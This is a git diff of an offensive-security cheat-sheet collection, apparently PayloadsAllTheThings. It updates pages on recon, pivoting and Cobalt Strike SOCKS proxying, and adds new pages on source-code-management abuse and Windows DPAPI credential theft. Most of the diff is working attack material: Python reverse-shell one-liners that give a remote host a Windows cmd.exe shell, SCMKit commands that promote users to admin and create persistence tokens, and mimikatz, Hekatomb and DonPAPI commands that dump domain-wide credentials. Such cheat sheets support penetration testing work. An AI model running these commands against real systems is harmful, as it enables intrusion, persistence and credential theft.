* [How NOT to use the PAM trust - Leveraging Shadow Principals for Cross Forest Attacks - Thursday, April 18, 2019 - Nikhil SamratAshok Mittal](http://www.labofapenetrationtester.com/2019/04/abusing-PAM.html)
|
||||
* [Shadow Credentials - The Hacker Recipes](https://www.thehacker.recipes/ad/movement/kerberos/shadow-credentials)
|
||||
* [Network Access Accounts are evil… - ROGER ZANDER - 13 SEP 2015](https://rzander.azurewebsites.net/network-access-accounts-are-evil/)
|
||||
* [The Phantom Credentials of SCCM: Why the NAA Won’t Die - Duane Michael - Jun 28](https://posts.specterops.io/the-phantom-credentials-of-sccm-why-the-naa-wont-die-332ac7aa1ab9)
|
||||
|
@ -337,6 +337,11 @@ Opsec safe Pass-the-Hash:
|
||||
```powershell
|
||||
# Start a SOCKS server on the given port on your teamserver, tunneling traffic through the specified Beacon. Set the teamserver/port configuration in /etc/proxychains.conf for easy usage.
|
||||
beacon > socks [PORT]
|
||||
beacon > socks [port]
|
||||
beacon > socks [port] [socks4]
|
||||
beacon > socks [port] [socks5]
|
||||
beacon > socks [port] [socks5] [enableNoAuth|disableNoAuth] [user] [password]
|
||||
beacon > socks [port] [socks5] [enableNoAuth|disableNoAuth] [user] [password] [enableLogging|disableLogging]
|
||||
|
||||
# Proxy browser traffic through a specified Internet Explorer process.
|
||||
beacon > browserpivot [pid] [x86|x64]
|
||||
|
@ -6,97 +6,58 @@
|
||||
* Shodan
|
||||
* Wayback Machine
|
||||
* The Harvester
|
||||
* Github OSINT
|
||||
|
||||
* [Active Recon](#active-recon)
|
||||
* Network discovery
|
||||
* RPCClient
|
||||
* Enum4all
|
||||
|
||||
* [List all the subdirectories and files](#list-all-the-subdirectories-and-files)
|
||||
* Gobuster
|
||||
* Backup File Artifacts Checker
|
||||
* [Network discovery](#network-discovery)
|
||||
* [Web discovery](#web-discovery)
|
||||
|
||||
* [Web Vulnerabilities](#looking-for-web-vulnerabilities)
|
||||
* Repository Github
|
||||
* Burp
|
||||
* Web Checklist
|
||||
* Nikto
|
||||
* Payment functionality
|
||||
|
||||
## Passive recon
|
||||
|
||||
* Using Shodan (https://www.shodan.io/) to detect similar app
|
||||
* Using [Shodan](https://www.shodan.io/) to detect similar app
|
||||
|
||||
```bash
|
||||
can be integrated with nmap (https://github.com/glennzw/shodan-hq-nse)
|
||||
nmap --script shodan-hq.nse --script-args 'apikey=<yourShodanAPIKey>,target=<hackme>'
|
||||
```
|
||||
|
||||
* Using The Wayback Machine (https://archive.org/web/) to detect forgotten endpoints
|
||||
* Using [The Wayback Machine](https://archive.org/web/) to detect forgotten endpoints
|
||||
|
||||
```bash
|
||||
look for JS files, old links
|
||||
curl -sX GET "http://web.archive.org/cdx/search/cdx?url=<targetDomain.com>&output=text&fl=original&collapse=urlkey&matchType=prefix"
|
||||
```
|
||||
|
||||
* Using The Harvester (https://github.com/laramies/theHarvester)
|
||||
* Using [The Harvester](https://github.com/laramies/theHarvester)
|
||||
|
||||
```python
|
||||
python theHarvester.py -b all -d domain.com
|
||||
```
|
||||
|
||||
## Active recon
|
||||
|
||||
* [Network discovery](Network%20Discovery.md) with masscan, nmap etc.
|
||||
|
||||
* rpcclient
|
||||
|
||||
* Look for private information in [GitHub]() repos with [GitRob](https://github.com/michenriksen/gitrob.git)
|
||||
```bash
|
||||
$ rpcclient -U '%' [target host]
|
||||
rpcclient $> querydominfo
|
||||
Domain: WORKGROUP
|
||||
Server: METASPLOITABLE
|
||||
Comment: metasploitable server (Samba 3.0.20-Debian)
|
||||
Total Users: 35
|
||||
|
||||
rpcclient $> enumdomusers
|
||||
user:[games] rid:[0x3f2]
|
||||
user:[nobody] rid:[0x1f5]
|
||||
user:[bind] rid:[0x4ba]
|
||||
gitrob analyze johndoe --site=https://github.acme.com --endpoint=https://github.acme.com/api/v3 --access-tokens=token1,token2
|
||||
```
|
||||
|
||||
* enum4linux
|
||||
|
||||
```bash
|
||||
enum4linux v0.8.9 (http://labs.portcullis.co.uk/application/enum4linux/)
|
||||
Usage: ./enum4linux.pl [options] ip
|
||||
-U get userlist
|
||||
-M get machine list*
|
||||
-S get sharelist
|
||||
-P get password policy information
|
||||
-G get group and member list
|
||||
-d be detailed, applies to -U and -S
|
||||
-u user specify username to use (default “”)
|
||||
-p pass specify password to use (default “”
|
||||
-a Do all simple enumeration (-U -S -G -P -r -o -n -i).
|
||||
-o Get OS information
|
||||
-i Get printer information
|
||||
==============================
|
||||
| Users on XXX.XXX.XXX.XXX |
|
||||
==============================
|
||||
index: 0x1 Account: games Name: games Desc: (null)
|
||||
index: 0x2 Account: nobody Name: nobody Desc: (null)
|
||||
index: 0x3 Account: bind Name: (null) Desc: (null)
|
||||
index: 0x4 Account: proxy Name: proxy Desc: (null)
|
||||
index: 0x5 Account: syslog Name: (null) Desc: (null)
|
||||
index: 0x6 Account: user Name: just a user,111,, Desc: (null)
|
||||
index: 0x7 Account: www-data Name: www-data Desc: (null)
|
||||
index: 0x8 Account: root Name: root Desc: (null)
|
||||
```
|
||||
## Active recon
|
||||
|
||||
* Zone Transfer
|
||||
### Network discovery
|
||||
|
||||
```powershell
|
||||
* Subdomains enumeration
|
||||
* [projectdiscovery/subfinder](https://github.com/projectdiscovery/subfinder): `subfinder -d hackerone.com`
|
||||
|
||||
* Network discovery
|
||||
* Scan IP ranges with `nmap`, [robertdavidgraham/masscan](https://github.com/robertdavidgraham/masscan) and [projectdiscovery/naabu](https://github.com/projectdiscovery/naabu)
|
||||
* Discover services, version and banners
|
||||
|
||||
* ASN enumeration
|
||||
* [projectdiscovery/asnmap](https://github.com/projectdiscovery/asnmap): `asnmap -a AS45596 -silent`
|
||||
|
||||
* DNS Zone Transfer
|
||||
```ps1
|
||||
host -t ns domain.local
|
||||
domain.local name server master.domain.local.
|
||||
|
||||
@ -106,105 +67,66 @@
|
||||
dig axfr domain.local @192.168.1.1
|
||||
```
|
||||
|
||||
## List all the subdirectories and files
|
||||
### Web discovery
|
||||
|
||||
* Using BFAC (Backup File Artifacts Checker): An automated tool that checks for backup artifacts that may disclose the web-application's source code.
|
||||
* List all the subdirectories and files with `gobuster` or `ffuf`
|
||||
```ps1
|
||||
# gobuster -w wordlist -u URL -t threads
|
||||
./gobuster -u http://example.com/ -w words.txt -t 10
|
||||
```
|
||||
|
||||
* Find backup files with [mazen160/bfac](https://github.com/mazen160/bfac)
|
||||
```bash
|
||||
git clone https://github.com/mazen160/bfac
|
||||
|
||||
Check a single URL
|
||||
bfac --url http://example.com/test.php --level 4
|
||||
|
||||
Check a list of URLs
|
||||
bfac --list testing_list.txt
|
||||
```
|
||||
|
||||
* Using DirBuster or GoBuster
|
||||
* Map technologies: Web service enumeration using [projectdiscovery/httpx](https://github.com/projectdiscovery/httpx) or Wappalyzer
|
||||
* Gather favicon hash, JARM fingerprint, ASN, status code, services and technologies (Github Pages, Cloudflare, Ruby, Nginx,...)
|
||||
|
||||
```bash
|
||||
./gobuster -u http://buffered.io/ -w words.txt -t 10
|
||||
-u url
|
||||
-w wordlist
|
||||
-t threads
|
||||
* Take screenshots for every websites using [sensepost/gowitness](https://github.com/sensepost/gowitness)
|
||||
|
||||
More subdomain :
|
||||
./gobuster -m dns -w subdomains.txt -u google.com -i
|
||||
* Automated vulnerability scanners
|
||||
* [projectdiscovery/nuclei](https://github.com/projectdiscovery/nuclei): `nuclei -u https://example.com`
|
||||
* [Burp Suite's web vulnerability scanner](https://portswigger.net/burp/vulnerability-scanner)
|
||||
* [sullo/nikto](https://github.com/sullo/nikto): `./nikto.pl -h http://www.example.com`
|
||||
|
||||
gobuster -w wordlist -u URL -r -e
|
||||
```
|
||||
* Manual Testing: Explore the website with a proxy:
|
||||
* [Caido - A lightweight web security auditing toolkit](https://caido.io/)
|
||||
* [ZAP - OWASP Zed Attack Proxy](https://www.zaproxy.org/)
|
||||
* [Burp Suite - Community Edition](https://portswigger.net/burp/communitydownload)
|
||||
|
||||
* Using a script to detect all phpinfo.php files in a range of IPs (CIDR can be found with a whois)
|
||||
|
||||
```bash
|
||||
#!/bin/bash
|
||||
for ipa in 98.13{6..9}.{0..255}.{0..255}; do
|
||||
wget -t 1 -T 3 http://${ipa}/phpinfo.php; done &
|
||||
```
|
||||
|
||||
* Using a script to detect all .htpasswd files in a range of IPs
|
||||
|
||||
```bash
|
||||
#!/bin/bash
|
||||
for ipa in 98.13{6..9}.{0..255}.{0..255}; do
|
||||
wget -t 1 -T 3 http://${ipa}/.htpasswd; done &
|
||||
```
|
||||
|
||||
## Looking for Web vulnerabilities
|
||||
|
||||
* Look for private information in GitHub repos with GitRob
|
||||
|
||||
```bash
|
||||
git clone https://github.com/michenriksen/gitrob.git
|
||||
gitrob analyze johndoe --site=https://github.acme.com --endpoint=https://github.acme.com/api/v3 --access-tokens=token1,token2
|
||||
```
|
||||
|
||||
* Explore the website with a proxy (ZAP/Burp Suite)
|
||||
1. Start proxy, visit the main target site and perform a Forced Browse to discover files and directories
|
||||
2. Map technologies used with Wappalyzer and Burp Suite (or ZAP) proxy
|
||||
3. Explore and understand available functionality, noting areas that correspond to vulnerability types
|
||||
|
||||
```bash
|
||||
Burp Proxy configuration on port 8080 (in .bashrc):
|
||||
alias set_proxy_burp='gsettings set org.gnome.system.proxy.http host "http://localhost";gsettings set org.gnome.system.proxy.http port 8080;gsettings set org.gnome.system.proxy mode "manual"'
|
||||
alias set_proxy_normal='gsettings set org.gnome.system.proxy mode "none"'
|
||||
|
||||
then launch Burp with : java -jar burpsuite_free_v*.jar &
|
||||
```
|
||||
|
||||
* [WAHH Task Checklist](https://gist.github.com/gbedoya/10935137) copied from http://mdsec.net/wahh/tasks.html
|
||||
* Explore the website and look for vulnerabilities listed in this repository: SQL injection, XSS, CRLF, ....
|
||||
* [The Web Application Hacker's Handbook Checklist](https://gist.github.com/gbedoya/10935137) copied from http://mdsec.net/wahh/tasks.html
|
||||
|
||||
* Subscribe to the site and pay for the additional functionality to test
|
||||
|
||||
* Launch a Nikto scan in case you missed something
|
||||
|
||||
```powershell
|
||||
nikto -h http://domain.example.com
|
||||
```
|
||||
|
||||
* Payment functionality - [@gwendallecoguic](https://twitter.com/gwendallecoguic/status/988138794686779392)
|
||||
* Inspect Payment functionality - [@gwendallecoguic](https://twitter.com/gwendallecoguic/status/988138794686779392)
|
||||
> if the webapp you're testing uses an external payment gateway, check the doc to find the test credit numbers, purchase something and if the webapp didn't disable the test mode, it will be free
|
||||
|
||||
From https://stripe.com/docs/testing#cards : "Use any of the following test card numbers, a valid expiration date in the future, and any random CVC number, to create a successful payment. Each test card's billing country is set to U.S. "
|
||||
e.g :
|
||||
|
||||
Test card numbers and tokens
|
||||
Test card numbers and tokens
|
||||
|
||||
| NUMBER | BRAND | TOKEN |
|
||||
| :------------- | :------------- | :------------- |
|
||||
| 4242424242424242 | Visa | tok_visa |
|
||||
| 4000056655665556 | Visa (debit) | tok_visa_debit |
|
||||
| 5555555555554444 | Mastercard | tok_mastercard |
|
||||
| NUMBER | BRAND | TOKEN |
|
||||
| :------------- | :------------- | :------------- |
|
||||
| 4242424242424242 | Visa | tok_visa |
|
||||
| 4000056655665556 | Visa (debit) | tok_visa_debit |
|
||||
| 5555555555554444 | Mastercard | tok_mastercard |
|
||||
|
||||
International test card numbers and tokens
|
||||
International test card numbers and tokens
|
||||
|
||||
| NUMBER | TOKEN | COUNTRY | BRAND |
|
||||
| :------------- | :------------- | :------------- | :------------- |
|
||||
| 4000000400000008 | tok_at | Austria (AT) | Visa |
|
||||
| 4000000560000004 | tok_be | Belgium (BE) | Visa |
|
||||
| 4000002080000001 | tok_dk | Denmark (DK) | Visa |
|
||||
| 4000002460000001 | tok_fi | Finland (FI) | Visa |
|
||||
| 4000002500000003 | tok_fr | France (FR) | Visa |
|
||||
| NUMBER | TOKEN | COUNTRY | BRAND |
|
||||
| :------------- | :------------- | :------------- | :------------- |
|
||||
| 4000000400000008 | tok_at | Austria (AT) | Visa |
|
||||
| 4000000560000004 | tok_be | Belgium (BE) | Visa |
|
||||
| 4000002080000001 | tok_dk | Denmark (DK) | Visa |
|
||||
| 4000002460000001 | tok_fi | Finland (FI) | Visa |
|
||||
| 4000002500000003 | tok_fr | France (FR) | Visa |
|
||||
|
||||
## References
|
||||
|
||||
|
@ -20,6 +20,7 @@
|
||||
* [RevSocks](#revsocks)
|
||||
* [plink](#plink)
|
||||
* [ngrok](#ngrok)
|
||||
* [Capture a network trace with builtin tools](#capture-a-network-trace-with-builtin-tools)
|
||||
* [Basic Pivoting Types](#basic-pivoting-types)
|
||||
* [Listen - Listen](#listen---listen)
|
||||
* [Listen - Connect](#listen---connect)
|
||||
@ -410,7 +411,39 @@ tar xvzf cloudflared-stable-linux-amd64.tgz
|
||||
# Expose accessible internal service to the internet
|
||||
./cloudflared tunnel --url <protocol>://<host>:<port>
|
||||
```
|
||||
|
||||
|
||||
## Capture a network trace with builtin tools
|
||||
|
||||
* Windows (netsh)
|
||||
```ps1
|
||||
# start a capture use the netsh command.
|
||||
netsh trace start capture=yes report=disabled tracefile=c:\trace.etl maxsize=16384
|
||||
|
||||
# stop the trace
|
||||
netsh trace stop
|
||||
|
||||
# Event tracing can be also used across a reboots
|
||||
netsh trace start capture=yes report=disabled persistent=yes tracefile=c:\trace.etl maxsize=16384
|
||||
|
||||
# To open the file in Wireshark you have to convert the etl file to the cap file format. Microsoft has written a convert for this task. Download the latest version.
|
||||
etl2pcapng.exe c:\trace.etl c:\trace.pcapng
|
||||
|
||||
# Use filters
|
||||
netsh trace start capture=yes report=disabled Ethernet.Type=IPv4 IPv4.Address=10.200.200.3 tracefile=c:\trace.etl maxsize=16384
|
||||
```
|
||||
* Linux (tcpdump)
|
||||
```ps1
|
||||
sudo apt-get install tcpdump
|
||||
tcpdump -w 0001.pcap -i eth0
|
||||
tcpdump -A -i eth0
|
||||
|
||||
# capture every TCP packet
|
||||
tcpdump -i eth0 tcp
|
||||
|
||||
# capture everything on port 22
|
||||
tcpdump -i eth0 port 22
|
||||
```
|
||||
|
||||
|
||||
## Basic Pivoting Types
|
||||
|
||||
@ -456,3 +489,4 @@ tar xvzf cloudflared-stable-linux-amd64.tgz
|
||||
* 🇫🇷 [Etat de l’art du pivoting réseau en 2019 - Oct 28,2019 - Alexandre ZANNI](https://cyberdefense.orange.com/fr/blog/etat-de-lart-du-pivoting-reseau-en-2019/) - 🇺🇸 [Overview of network pivoting and tunneling [2022 updated] - Alexandre ZANNI](https://blog.raw.pm/en/state-of-the-art-of-network-pivoting-in-2019/)
|
||||
* [Red Team: Using SharpChisel to exfil internal network - Shantanu Khandelwal - Jun 8](https://medium.com/@shantanukhande/red-team-using-sharpchisel-to-exfil-internal-network-e1b07ed9b49)
|
||||
* [Active Directory - hideandsec](https://hideandsec.sh/books/cheatsheets-82c/page/active-directory)
|
||||
* [Windows: Capture a network trace with builtin tools (netsh) - February 22, 2021 Michael Albert](https://michlstechblog.info/blog/windows-capture-a-network-trace-with-builtin-tools-netsh/)
|
@ -159,10 +159,16 @@ IPv6 (No Spaces, Shortened)
|
||||
python -c 'a=__import__;c=a("socket");o=a("os").dup2;p=a("pty").spawn;s=c.socket(c.AF_INET6,c.SOCK_STREAM);s.connect(("dead:beef:2::125c",4242,0,2));f=s.fileno;o(f(),0);o(f(),1);o(f(),2);p("/bin/sh")'
|
||||
```
|
||||
|
||||
Windows only
|
||||
Windows only (Python2)
|
||||
|
||||
```powershell
|
||||
C:\Python27\python.exe -c "(lambda __y, __g, __contextlib: [[[[[[[(s.connect(('10.0.0.1', 4242)), [[[(s2p_thread.start(), [[(p2s_thread.start(), (lambda __out: (lambda __ctx: [__ctx.__enter__(), __ctx.__exit__(None, None, None), __out[0](lambda: None)][2])(__contextlib.nested(type('except', (), {'__enter__': lambda self: None, '__exit__': lambda __self, __exctype, __value, __traceback: __exctype is not None and (issubclass(__exctype, KeyboardInterrupt) and [True for __out[0] in [((s.close(), lambda after: after())[1])]][0])})(), type('try', (), {'__enter__': lambda self: None, '__exit__': lambda __self, __exctype, __value, __traceback: [False for __out[0] in [((p.wait(), (lambda __after: __after()))[1])]][0]})())))([None]))[1] for p2s_thread.daemon in [(True)]][0] for __g['p2s_thread'] in [(threading.Thread(target=p2s, args=[s, p]))]][0])[1] for s2p_thread.daemon in [(True)]][0] for __g['s2p_thread'] in [(threading.Thread(target=s2p, args=[s, p]))]][0] for __g['p'] in [(subprocess.Popen(['\\windows\\system32\\cmd.exe'], stdout=subprocess.PIPE, stderr=subprocess.STDOUT, stdin=subprocess.PIPE))]][0])[1] for __g['s'] in [(socket.socket(socket.AF_INET, socket.SOCK_STREAM))]][0] for __g['p2s'], p2s.__name__ in [(lambda s, p: (lambda __l: [(lambda __after: __y(lambda __this: lambda: (__l['s'].send(__l['p'].stdout.read(1)), __this())[1] if True else __after())())(lambda: None) for __l['s'], __l['p'] in [(s, p)]][0])({}), 'p2s')]][0] for __g['s2p'], s2p.__name__ in [(lambda s, p: (lambda __l: [(lambda __after: __y(lambda __this: lambda: [(lambda __after: (__l['p'].stdin.write(__l['data']), __after())[1] if (len(__l['data']) > 0) else __after())(lambda: __this()) for __l['data'] in [(__l['s'].recv(1024))]][0] if True else __after())())(lambda: None) for __l['s'], __l['p'] in [(s, p)]][0])({}), 's2p')]][0] for __g['os'] in [(__import__('os', __g, __g))]][0] for __g['socket'] in [(__import__('socket', __g, __g))]][0] for __g['subprocess'] in [(__import__('subprocess', __g, __g))]][0] for __g['threading'] in [(__import__('threading', __g, __g))]][0])((lambda f: (lambda x: x(x))(lambda y: f(lambda: y(y)()))), globals(), __import__('contextlib'))"
|
||||
python.exe -c "(lambda __y, __g, __contextlib: [[[[[[[(s.connect(('10.0.0.1', 4242)), [[[(s2p_thread.start(), [[(p2s_thread.start(), (lambda __out: (lambda __ctx: [__ctx.__enter__(), __ctx.__exit__(None, None, None), __out[0](lambda: None)][2])(__contextlib.nested(type('except', (), {'__enter__': lambda self: None, '__exit__': lambda __self, __exctype, __value, __traceback: __exctype is not None and (issubclass(__exctype, KeyboardInterrupt) and [True for __out[0] in [((s.close(), lambda after: after())[1])]][0])})(), type('try', (), {'__enter__': lambda self: None, '__exit__': lambda __self, __exctype, __value, __traceback: [False for __out[0] in [((p.wait(), (lambda __after: __after()))[1])]][0]})())))([None]))[1] for p2s_thread.daemon in [(True)]][0] for __g['p2s_thread'] in [(threading.Thread(target=p2s, args=[s, p]))]][0])[1] for s2p_thread.daemon in [(True)]][0] for __g['s2p_thread'] in [(threading.Thread(target=s2p, args=[s, p]))]][0] for __g['p'] in [(subprocess.Popen(['\\windows\\system32\\cmd.exe'], stdout=subprocess.PIPE, stderr=subprocess.STDOUT, stdin=subprocess.PIPE))]][0])[1] for __g['s'] in [(socket.socket(socket.AF_INET, socket.SOCK_STREAM))]][0] for __g['p2s'], p2s.__name__ in [(lambda s, p: (lambda __l: [(lambda __after: __y(lambda __this: lambda: (__l['s'].send(__l['p'].stdout.read(1)), __this())[1] if True else __after())())(lambda: None) for __l['s'], __l['p'] in [(s, p)]][0])({}), 'p2s')]][0] for __g['s2p'], s2p.__name__ in [(lambda s, p: (lambda __l: [(lambda __after: __y(lambda __this: lambda: [(lambda __after: (__l['p'].stdin.write(__l['data']), __after())[1] if (len(__l['data']) > 0) else __after())(lambda: __this()) for __l['data'] in [(__l['s'].recv(1024))]][0] if True else __after())())(lambda: None) for __l['s'], __l['p'] in [(s, p)]][0])({}), 's2p')]][0] for __g['os'] in [(__import__('os', __g, __g))]][0] for __g['socket'] in [(__import__('socket', __g, __g))]][0] for __g['subprocess'] in [(__import__('subprocess', __g, __g))]][0] for __g['threading'] in [(__import__('threading', __g, __g))]][0])((lambda f: (lambda x: x(x))(lambda y: f(lambda: y(y)()))), globals(), __import__('contextlib'))"
|
||||
```
|
||||
|
||||
Windows only (Python3)
|
||||
|
||||
```powershell
|
||||
python.exe -c "import socket,os,threading,subprocess as sp;p=sp.Popen(['cmd.exe'],stdin=sp.PIPE,stdout=sp.PIPE,stderr=sp.STDOUT);s=socket.socket();s.connect(('10.0.0.1',4242));threading.Thread(target=exec,args=(\"while(True):o=os.read(p.stdout.fileno(),1024);s.send(o)\",globals()),daemon=True).start();threading.Thread(target=exec,args=(\"while(True):i=s.recv(1024);os.write(p.stdin.fileno(),i)\",globals())).start()"
|
||||
```
|
||||
|
||||
### PHP
|
||||
|
125
Methodology and Resources/Source Code Management.md
Normal file
@ -0,0 +1,125 @@
|
||||
# Source Code Management
|
||||
|
||||
>
|
||||
|
||||
## Summary
|
||||
|
||||
* [Enumeration](#enumeration)
|
||||
* [Exploit Gitlab CI/Github Actions](#exploit-gitlab-cigithub-actions)
|
||||
* [References](#references)
|
||||
|
||||
|
||||
## Enumeration
|
||||
|
||||
|
||||
Using [SCMKit - Source Code Management Attack Toolkit](https://github.com/xforcered/SCMKit)
|
||||
|
||||
* Discover repositories being used in a particular SCM system
|
||||
```ps1
|
||||
SCMKit.exe -s gitlab -m listrepo -c userName:password -u https://gitlab.something.local
|
||||
SCMKit.exe -s gitlab -m listrepo -c apiKey -u https://gitlab.something.local
|
||||
```
|
||||
* Search for repositories by repository name in a particular SCM system
|
||||
```ps1
|
||||
SCMKit.exe -s github -m searchrepo -c userName:password -u https://github.something.local -o "some search term"
|
||||
SCMKit.exe -s gitlab -m searchrepo -c apikey -u https://gitlab.something.local -o "some search term"
|
||||
```
|
||||
* Search for code containing a given keyword in a particular SCM system
|
||||
```ps1
|
||||
SCMKit.exe -s github -m searchcode -c userName:password -u https://github.something.local -o "some search term"
|
||||
SCMKit.exe -s github -m searchcode -c apikey -u https://github.something.local -o "some search term"
|
||||
```
|
||||
* Search for files in repositories containing a given keyword in the file name in a particular SCM system
|
||||
```ps1
|
||||
SCMKit.exe -s gitlab -m searchfile -c userName:password -u https://gitlab.something.local -o "some search term"
|
||||
SCMKit.exe -s gitlab -m searchfile -c apikey -u https://gitlab.something.local -o "some search term"
|
||||
```
|
||||
* List snippets owned by the current user in GitLab
|
||||
```ps1
|
||||
SCMKit.exe -s gitlab -m listsnippet -c userName:password -u https://gitlab.something.local
|
||||
SCMKit.exe -s gitlab -m listsnippet -c apikey -u https://gitlab.something.local
|
||||
```
|
||||
* List all GitLab runners available to the current user in GitLab
|
||||
```ps1
|
||||
SCMKit.exe -s gitlab -m listrunner -c userName:password -u https://gitlab.something.local
|
||||
SCMKit.exe -s gitlab -m listrunner -c apikey -u https://gitlab.something.local
|
||||
```
|
||||
* Get the assigned privileges to an access token being used in a particular SCM system
|
||||
```ps1
|
||||
SCMKit.exe -s gitlab -m privs -c apiKey -u https://gitlab.something.local
|
||||
```
|
||||
* Promote a normal user to an administrative role in a particular SCM system
|
||||
```ps1
|
||||
SCMKit.exe -s gitlab -m addadmin -c userName:password -u https://gitlab.something.local -o targetUserName
|
||||
SCMKit.exe -s gitlab -m addadmin -c apikey -u https://gitlab.something.local -o targetUserName
|
||||
SCMKit.exe -s gitlab -m removeadmin -c userName:password -u https://gitlab.something.local -o targetUserName
|
||||
```
|
||||
* Create/List/Delete an access token to be used in a particular SCM system
|
||||
```ps1
|
||||
SCMKit.exe -s gitlab -m createpat -c userName:password -u https://gitlab.something.local -o targetUserName
|
||||
SCMKit.exe -s gitlab -m createpat -c apikey -u https://gitlab.something.local -o targetUserName
|
||||
SCMKit.exe -s gitlab -m removepat -c userName:password -u https://gitlab.something.local -o patID
|
||||
SCMKit.exe -s gitlab -m listpat -c userName:password -u https://gitlab.something.local -o targetUser
|
||||
SCMKit.exe -s gitlab -m listpat -c apikey -u https://gitlab.something.local -o targetUser
|
||||
```
|
||||
* Create/List an SSH key to be used in a particular SCM system
|
||||
```ps1
|
||||
SCMKit.exe -s gitlab -m createsshkey -c userName:password -u https://gitlab.something.local -o "ssh public key"
|
||||
SCMKit.exe -s gitlab -m createsshkey -c apiToken -u https://gitlab.something.local -o "ssh public key"
|
||||
SCMKit.exe -s gitlab -m listsshkey -c userName:password -u https://github.something.local
|
||||
SCMKit.exe -s gitlab -m listsshkey -c apiToken -u https://github.something.local
|
||||
SCMKit.exe -s gitlab -m removesshkey -c userName:password -u https://gitlab.something.local -o sshKeyID
|
||||
SCMKit.exe -s gitlab -m removesshkey -c apiToken -u https://gitlab.something.local -o sshKeyID
|
||||
```
|
||||
|
||||
## Personal Access Token
|
||||
|
||||
Create a PAT (Personal Access Token) as a persistence mechanism for the Gitlab instance.
|
||||
|
||||
```ps1
|
||||
curl -k --request POST --header "PRIVATE-TOKEN: apiToken" --data "name=user-persistence-token" --data "expires_at=" --data "scopes[]=api" --data "scopes[]=read_repository" --data "scopes[]=write_repository" "https://gitlabHost/api/v4/users/UserIDNumber/personal_access_tokens"
|
||||
```
|
||||
|
||||
## Exploit Gitlab CI/Github Actions
|
||||
|
||||
* Gitlab-CI "Command Execution" example: `.gitlab-ci.yml`
|
||||
```yaml
|
||||
stages:
|
||||
- test
|
||||
|
||||
test:
|
||||
stage: test
|
||||
script:
|
||||
- |
|
||||
whoami
|
||||
parallel:
|
||||
matrix:
|
||||
- RUNNER: VM1
|
||||
- RUNNER: VM2
|
||||
- RUNNER: VM3
|
||||
tags:
|
||||
- ${RUNNER}
|
||||
```
|
||||
* Github Action "Command Execution" example: `.github/workflows/example.yml`
|
||||
```yml
|
||||
name: example
|
||||
on:
|
||||
workflow_dispatch:
|
||||
push:
|
||||
branches: [ main ]
|
||||
pull_request:
|
||||
branches: [ main ]
|
||||
|
||||
jobs:
|
||||
build:
|
||||
runs-on: windows-2019
|
||||
|
||||
steps:
|
||||
- name: Execute
|
||||
run: |
|
||||
whoami
|
||||
```
|
||||
|
||||
## References
|
||||
|
||||
* [Controlling the Source: Abusing Source Code Management Systems - Brett Hawkins - August 9, 2022](https://securityintelligence.com/posts/abusing-source-code-management-systems/)
|
86
Methodology and Resources/Windows - DPAPI.md
Normal file
@ -0,0 +1,86 @@
|
||||
# Windows - DPAPI
|
||||
|
||||
> On Windows, credentials saved in the Windows Credentials Manager are encrypted using Microsoft's Data Protection API and stored as "blob" files in user AppData folder.
|
||||
|
||||
## Summary
|
||||
|
||||
* [Data Protection API](#data-protection-api)
|
||||
* [List Credential Files](#list-credential-files)
|
||||
* [Mimikatz - Credential Manager & DPAPI](#mimikatz---credential-manager--dpapi)
|
||||
* [Hekatomb - Steal all credentials on domain](#hekatomb---steal-all-credentials-on-domain)
|
||||
* [DonPAPI - Dumping DPAPI credz remotely](#donpapi---dumping-dpapi-credz-remotely)
|
||||
|
||||
|
||||
## Data Protection API
|
||||
|
||||
* Outside of a domain: the user's `password hash` is used to encrypt these "blobs".
|
||||
* Inside a domain: the `domain controller's master key` is used to encrypt these blobs.
|
||||
|
||||
With the extracted private key of the domain controller, it is possible to decrypt all the blobs, and therefore to recover all the secrets recorded in the Windows identification manager of all the work
|
||||
stations in the domain.
|
||||
|
||||
```ps1
|
||||
vaultcmd /list
|
||||
|
||||
VaultCmd /listcreds:<namevault>|<guidvault> /all
|
||||
vaultcmd /listcreds:"Windows Credentials" /all
|
||||
```
|
||||
|
||||
### List Credential Files
|
||||
|
||||
```ps1
|
||||
dir /a:h C:\Users\username\AppData\Local\Microsoft\Credentials\
|
||||
dir /a:h C:\Users\username\AppData\Roaming\Microsoft\Credentials\
|
||||
|
||||
Get-ChildItem -Hidden C:\Users\username\AppData\Local\Microsoft\Credentials\
|
||||
Get-ChildItem -Hidden C:\Users\username\AppData\Roaming\Microsoft\Credentials\
|
||||
```
|
||||
|
||||
|
||||
### Mimikatz - Credential Manager & DPAPI
|
||||
|
||||
```powershell
|
||||
# check the folder to find credentials
|
||||
dir C:\Users\<username>\AppData\Local\Microsoft\Credentials\*
|
||||
|
||||
# check the file with mimikatz
|
||||
mimikatz dpapi::cred /in:C:\Users\<username>\AppData\Local\Microsoft\Credentials\2647629F5AA74CD934ECD2F88D64ECD0
|
||||
# find master key
|
||||
mimikatz !sekurlsa::dpapi
|
||||
# use master key
|
||||
mimikatz dpapi::cred /in:C:\Users\<username>\AppData\Local\Microsoft\Credentials\2647629F5AA74CD934ECD2F88D64ECD0 /masterkey:95664450d90eb2ce9a8b1933f823b90510b61374180ed5063043273940f50e728fe7871169c87a0bba5e0c470d91d21016311727bce2eff9c97445d444b6a17b
|
||||
|
||||
# find and export backup keys
|
||||
lsadump::backupkeys /system:dc01.lab.local /export
|
||||
# use backup keys
|
||||
dpapi::masterkey /in:"C:\Users\<USERNAME>\AppData\Roaming\Microsoft\Protect\S-1-5-21-2552734371-813931464-1050690807-1106\3e90dd9e-f901-40a1-b691-84d7f647b8fe" /pvk:ntds_capi_0_d2685b31-402d-493b-8d12-5fe48ee26f5a.pvk
|
||||
```
|
||||
|
||||
### Hekatomb - Steal all credentials on domain
|
||||
|
||||
> [Processus-Thief/Hekatomb](https://github.com/Processus-Thief/HEKATOMB) is a python script that connects to LDAP directory to retrieve all computers and users informations. Then it will download all DPAPI blob of all users from all computers. Finally, it will extract domain controller private key through RPC uses it to decrypt all credentials.
|
||||
|
||||
```python
|
||||
pip3 install hekatomb
|
||||
hekatomb -hashes :ed0052e5a66b1c8e942cc9481a50d56 DOMAIN.local/administrator@10.0.0.1 -debug -dnstcp
|
||||
```
|
||||
|
||||
![Data in memory](https://github.com/Processus-Thief/HEKATOMB/raw/main/.assets/github1.png)
|
||||
|
||||
### DonPAPI - Dumping DPAPI credz remotely
|
||||
|
||||
* [login-securite/DonPAPI](https://github.com/login-securite/DonPAPI)
|
||||
|
||||
```ps1
|
||||
DonPAPI.py domain/user:passw0rd@target
|
||||
DonPAPI.py --hashes <LM>:<NT> domain/user@target
|
||||
|
||||
# using domain backup key
|
||||
dpapi.py backupkeys --export -t domain/user:passw0rd@target_dc_ip
|
||||
